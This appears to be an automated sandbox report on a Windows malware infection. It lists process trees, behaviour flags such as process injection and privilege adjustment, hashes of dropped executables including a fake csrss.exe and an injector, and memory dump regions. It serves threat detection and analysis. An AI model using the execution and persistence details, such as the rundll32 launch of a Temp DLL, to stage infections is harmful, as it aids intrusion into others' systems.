    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        - Drops file in Program Files directory
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
          command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff7c0c15460,0x7ff7c0c15470,0x7ff7c0c15480
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6324 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6944 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3824 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3900 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7080 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6332 /prefetch:2
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3816 -ip 3816
[1] C:\Windows\system32\rUNdlL32.eXe
    command: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\rundll32.exe
      command: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 608
        - Program crash
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 936 -ip 936
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3816 -ip 3816
[1] C:\Windows\System32\CompPkgSrv.exe
    command: C:\Windows\System32\CompPkgSrv.exe -Embedding
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3816 -ip 3816
[1] C:\Windows\system32\svchost.exe
    command: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3816 -ip 3816
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1284 -ip 1284
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5144 -ip 5144
[1] C:\Windows\system32\svchost.exe
    command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1392 -ip 1392
[1] C:\Users\Admin\AppData\Roaming\cwbgidu
    command: C:\Users\Admin\AppData\Roaming\cwbgidu
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5144 -ip 5144
[1] C:\Windows\SysWOW64\WerFault.exe
    command: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5144 -ip 5144
Downloads
-
C:\Users\Admin\AppData\Local\Temp\axhub.dllMD5
1c7be730bdc4833afb7117d48c3fd513
SHA1dc7e38cfe2ae4a117922306aead5a7544af646b8
SHA2568206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1
SHA5127936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeMD5
d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeMD5
d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txtMD5
b7161c0845a64ff6d7345b67ff97f3b0
SHA1d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA51298d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txtMD5
f7562b07e6681fb293b61615812ab0d2
SHA14aa4f5c6e28ebf1fb1dad2870e0ed69bd03e0a84
SHA256be9861fe68f449357f79ba5255692c8d2c20a1a2528c4309a48367084390da90
SHA512e1a98f7b0002fd45eae83a924bde0df60d15b37734c88321033f2af3a4f4c3fb4b9783c3e59465b613b66bb48d47c6668665dc6bb52d09a50cc3b304a41d4078
-
C:\Users\Admin\AppData\Local\Temp\jamesold.exeMD5
af85533456a042c6ed3216f22a8a4c7c
SHA14e61ea1ce8ab3c8f36f9e4ee1ae61b04fe11de78
SHA2565149fc574b84e6842f5f11edd50ad7d4336bd6dd7ef3c4f3d7151256f0632a3a
SHA512a22bec47f3c03732cdeaf126a2a51b2683f0ba1b86a1c6caa648a829218a64354adf8975f5b236957d99da1c9a03a78d2f0899377c90cf6d0cbdb27ce995cdb5
-
C:\Users\Admin\AppData\Local\Temp\jamesold.exeMD5
af85533456a042c6ed3216f22a8a4c7c
SHA14e61ea1ce8ab3c8f36f9e4ee1ae61b04fe11de78
SHA2565149fc574b84e6842f5f11edd50ad7d4336bd6dd7ef3c4f3d7151256f0632a3a
SHA512a22bec47f3c03732cdeaf126a2a51b2683f0ba1b86a1c6caa648a829218a64354adf8975f5b236957d99da1c9a03a78d2f0899377c90cf6d0cbdb27ce995cdb5
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exeMD5
ecd7365422db60cf4f55f3c6f4ed49bf
SHA1e4b914e366e854fc076b0faa955d4f52ae6f840d
SHA25677041a33e4f52b86a78b12d80a21e48ba25e4d4c430090f33ba69a08f12a83a7
SHA512a6a3b539765c31957564ee166dd8f2539ff4cfb73e76eda3cae1120f15abea410cc735bd8b0e759d69971ed788e58191b8d1c6f18081236aa7a431c8f88b0a24
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exeMD5
ecd7365422db60cf4f55f3c6f4ed49bf
SHA1e4b914e366e854fc076b0faa955d4f52ae6f840d
SHA25677041a33e4f52b86a78b12d80a21e48ba25e4d4c430090f33ba69a08f12a83a7
SHA512a6a3b539765c31957564ee166dd8f2539ff4cfb73e76eda3cae1120f15abea410cc735bd8b0e759d69971ed788e58191b8d1c6f18081236aa7a431c8f88b0a24
-
C:\Users\Admin\AppData\Local\Temp\pub2.exeMD5
acc001810bc5d5df83c5d5e185f0d0e8
SHA1beeda559c8637bd7582a3099a66af89daab170af
SHA25622d4ec5b73cafb8ab5feab1a449d968ca784ebac1f4a8cf3224d3c0e79994b6e
SHA512bdcba8a41d7873f8db6f2c6d1e2a21cd8170e72ecfdaf385ffe0984756425ac83e191a45736770a3c956c19fb95f27790b6dfaff5e8efc2d842762b21725991d
-
C:\Users\Admin\AppData\Local\Temp\pub2.exeMD5
acc001810bc5d5df83c5d5e185f0d0e8
SHA1beeda559c8637bd7582a3099a66af89daab170af
SHA25622d4ec5b73cafb8ab5feab1a449d968ca784ebac1f4a8cf3224d3c0e79994b6e
SHA512bdcba8a41d7873f8db6f2c6d1e2a21cd8170e72ecfdaf385ffe0984756425ac83e191a45736770a3c956c19fb95f27790b6dfaff5e8efc2d842762b21725991d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnkMD5
4faa64ea7b975efa2eb018474e9c663e
SHA112f0cd5f02be895d407c9f2d0c842d6a55932e19
SHA2561b509de859d9ee8dba207b3c55344e8428cdff94c0d28a82c889d80d7c05e5d1
SHA51251df0fcd46307742df731d2580922fadabec5bceaad1493eff3929af5ec38f223baba68aba7c380cbf094a22c2aff3385aeaf787ad6aaac4365e458ca78eb4a3
-
C:\Users\Admin\AppData\Roaming\cwbgiduMD5
acc001810bc5d5df83c5d5e185f0d0e8
SHA1beeda559c8637bd7582a3099a66af89daab170af
SHA25622d4ec5b73cafb8ab5feab1a449d968ca784ebac1f4a8cf3224d3c0e79994b6e
SHA512bdcba8a41d7873f8db6f2c6d1e2a21cd8170e72ecfdaf385ffe0984756425ac83e191a45736770a3c956c19fb95f27790b6dfaff5e8efc2d842762b21725991d
-
C:\Users\Admin\AppData\Roaming\cwbgiduMD5
acc001810bc5d5df83c5d5e185f0d0e8
SHA1beeda559c8637bd7582a3099a66af89daab170af
SHA25622d4ec5b73cafb8ab5feab1a449d968ca784ebac1f4a8cf3224d3c0e79994b6e
SHA512bdcba8a41d7873f8db6f2c6d1e2a21cd8170e72ecfdaf385ffe0984756425ac83e191a45736770a3c956c19fb95f27790b6dfaff5e8efc2d842762b21725991d
-
C:\Users\Admin\Desktop\Microsoft Edge.lnkMD5
e431e873aee1d39f99467fcd62dc2dd9
SHA1576b2679875ca9ca71e44b6747a99661c3662882
SHA256e162888d6dc8b9096a43a61e18f43bf91c806b5bce1a455f4ab254466e5980ef
SHA51280dc3630e2d38e96cdc942f38c9c88320981a4655cb1e72a676332e8cb20a06f2e680dda2efd83e3f4bc7f13502a5f5dee5dd266860a4f1c8a65c36aa1feaef1
-
C:\Users\Admin\Pictures\Adobe Films\sHHgfnWbYrhYH15l5vk6FQMv.exeMD5
3f22bd82ee1b38f439e6354c60126d6d
SHA163b57d818f86ea64ebc8566faeb0c977839defde
SHA256265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
C:\Users\Admin\Pictures\Adobe Films\sHHgfnWbYrhYH15l5vk6FQMv.exeMD5
3f22bd82ee1b38f439e6354c60126d6d
SHA163b57d818f86ea64ebc8566faeb0c977839defde
SHA256265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
C:\Windows\rss\csrss.exeMD5
ce87d995553ba11aa4b3daffdb07e54c
SHA18efc3e83b98271c23badb3075d89f78bb0dcf014
SHA256f404162e5c384a40ee5d1800bae1637f5b9b19a820f8ef57f4932f71a03447e6
SHA512ca796c823bb24adf500a56369c520b162f138d6ed9d0a7a298ad8740935463c469b626a9c8da8643956442d4448f4d36a6e7f84cb0345a660c78be6591b1361a
-
C:\Windows\rss\csrss.exeMD5
ce87d995553ba11aa4b3daffdb07e54c
SHA18efc3e83b98271c23badb3075d89f78bb0dcf014
SHA256f404162e5c384a40ee5d1800bae1637f5b9b19a820f8ef57f4932f71a03447e6
SHA512ca796c823bb24adf500a56369c520b162f138d6ed9d0a7a298ad8740935463c469b626a9c8da8643956442d4448f4d36a6e7f84cb0345a660c78be6591b1361a
-
\??\c:\users\admin\appdata\local\microsoft\edge\user data\default\edge profile.icoMD5
e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
\??\pipe\LOCAL\crashpad_1380_MMJRRATUAKCOTQPHMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1284-201-0x0000000005200000-0x0000000005B26000-memory.dmpFilesize
9.1MB
-
memory/1284-200-0x0000000004DC3000-0x00000000051FF000-memory.dmpFilesize
4.2MB
-
memory/1284-202-0x0000000000400000-0x00000000030ED000-memory.dmpFilesize
44.9MB
-
memory/1288-160-0x0000000000470000-0x00000000004A2000-memory.dmpFilesize
200KB
-
memory/1288-163-0x00007FFF79890000-0x00007FFF7A351000-memory.dmpFilesize
10.8MB
-
memory/1392-214-0x0000000003BE0000-0x0000000003D9E000-memory.dmpFilesize
1.7MB
-
memory/2060-203-0x0000000000400000-0x0000000000661000-memory.dmpFilesize
2.4MB
-
memory/2364-161-0x0000000007EF0000-0x0000000007F2C000-memory.dmpFilesize
240KB
-
memory/2364-143-0x0000000002D40000-0x0000000002D6F000-memory.dmpFilesize
188KB
-
memory/2364-159-0x0000000004D90000-0x0000000004DA2000-memory.dmpFilesize
72KB
-
memory/2364-135-0x0000000002E4F000-0x0000000002E71000-memory.dmpFilesize
136KB
-
memory/2364-211-0x0000000004DC3000-0x0000000004DC4000-memory.dmpFilesize
4KB
-
memory/2364-166-0x00000000080D0000-0x00000000081DA000-memory.dmpFilesize
1.0MB
-
memory/2364-164-0x0000000004DC0000-0x0000000004DC1000-memory.dmpFilesize
4KB
-
memory/2364-165-0x0000000004DC2000-0x0000000004DC3000-memory.dmpFilesize
4KB
-
memory/2364-141-0x0000000002E4F000-0x0000000002E71000-memory.dmpFilesize
136KB
-
memory/2364-212-0x0000000004DC4000-0x0000000004DC6000-memory.dmpFilesize
8KB
-
memory/2364-150-0x0000000007320000-0x00000000078C4000-memory.dmpFilesize
5.6MB
-
memory/2364-210-0x0000000073000000-0x00000000737B0000-memory.dmpFilesize
7.7MB
-
memory/2364-152-0x0000000000400000-0x0000000002CCD000-memory.dmpFilesize
40.8MB
-
memory/2364-156-0x00000000078D0000-0x0000000007EE8000-memory.dmpFilesize
6.1MB
-
memory/2712-208-0x00000000080C0000-0x00000000080D6000-memory.dmpFilesize
88KB
-
memory/2712-229-0x00000000029F0000-0x0000000002A06000-memory.dmpFilesize
88KB
-
memory/3112-174-0x00007FFF98910000-0x00007FFF98911000-memory.dmpFilesize
4KB
-
memory/3816-162-0x0000000000400000-0x00000000030ED000-memory.dmpFilesize
44.9MB
-
memory/3816-142-0x0000000005280000-0x0000000005BA6000-memory.dmpFilesize
9.1MB
-
memory/3816-194-0x0000000004D39000-0x0000000005175000-memory.dmpFilesize
4.2MB
-
memory/4032-197-0x0000000000400000-0x0000000002CBE000-memory.dmpFilesize
40.7MB
-
memory/4032-149-0x0000000002E8E000-0x0000000002E97000-memory.dmpFilesize
36KB
-
memory/4032-196-0x0000000002DC0000-0x0000000002DC9000-memory.dmpFilesize
36KB
-
memory/4032-195-0x0000000002E8E000-0x0000000002E97000-memory.dmpFilesize
36KB
-
memory/5144-207-0x0000000000400000-0x00000000030ED000-memory.dmpFilesize
44.9MB
-
memory/5144-204-0x0000000005200000-0x000000000563C000-memory.dmpFilesize
4.2MB
-
memory/5552-224-0x0000000002FAE000-0x0000000002FB7000-memory.dmpFilesize
36KB
-
memory/5552-227-0x0000000002FAE000-0x0000000002FB7000-memory.dmpFilesize
36KB
-
memory/5552-228-0x0000000000400000-0x0000000002CBE000-memory.dmpFilesize
40.7MB